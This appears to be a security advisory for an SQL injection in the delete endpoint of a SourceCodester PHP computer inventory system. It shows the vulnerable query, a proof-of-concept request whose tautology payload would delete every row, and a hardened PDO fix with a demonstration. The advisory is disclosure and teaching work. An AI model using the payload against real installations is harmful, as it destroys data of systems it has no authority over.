SOURCECODESTER / Computer Inventory System - delete-computer.php SQL Injection

Credits

Joshua Lictan (https://github.com/skid-nochizplz/skid-nochizplz)

Vendor Homepage:

https://www.sourcecodester.com/php/17165/computer-inventory-system-using-php-and-mysql-source-code.html

Affected Component

/endpoint/delete-computer.php

Code

        $query = "DELETE FROM tbl_computer WHERE tbl_computer_id = '$computer'";

        $stmt = $conn->prepare($query);

        $query_execute = $stmt->execute();

Proof of Concept

HTTP Request Example

GET /endpoint/delete-computer.php?computer=1'+or+1%3d1+%23 HTTP/1.1
Host: 
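
The corrected form of the query shown under Code, as an added example that is not code from the application or from the advisory author: the id is validated as a positive integer and then passed as a bound parameter instead of being interpolated into the SQL text. It assumes `$conn` is a PDO handle (the `prepare()`/`execute()` calls fit PDO, but the page does not say); the function name `deleteComputer` and the in-memory SQLite table with its rows are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

/**
 * Hardened delete: validate the id as a positive integer, then bind it.
 * Returns the number of rows deleted; throws on a malformed id.
 * (Hypothetical helper name, not part of the original application.)
 */
function deleteComputer(PDO $conn, string $rawId): int
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('computer id must be a positive integer');
    }

    // The placeholder keeps the request value out of the SQL text entirely,
    // so quotes and comment markers in it can never change the statement.
    $stmt = $conn->prepare('DELETE FROM tbl_computer WHERE tbl_computer_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database
// (assumption: the pdo_sqlite extension is available; the application itself uses MySQL).
$conn = new PDO('sqlite::memory:');
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$conn->exec('CREATE TABLE tbl_computer (tbl_computer_id INTEGER PRIMARY KEY, name TEXT)');
$conn->exec("INSERT INTO tbl_computer (name) VALUES ('pc-01'), ('pc-02'), ('pc-03')");

// First input is the URL-decoded `computer` value from the request on this page,
// second is an ordinary id.
$inputs = ["1' or 1=1 #", '2'];

foreach ($inputs as $raw) {
    try {
        printf("%-14s deleted %d row(s)\n", $raw, deleteComputer($conn, $raw));
    } catch (InvalidArgumentException $e) {
        printf("%-14s rejected: %s\n", $raw, $e->getMessage());
    }
}

$left = (int) $conn->query('SELECT COUNT(*) FROM tbl_computer')->fetchColumn();
printf("rows remaining: %d\n", $left);
```

The integer check matters on MySQL even with binding, because MySQL coerces a string with a leading digit to a number when comparing it with an integer column.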
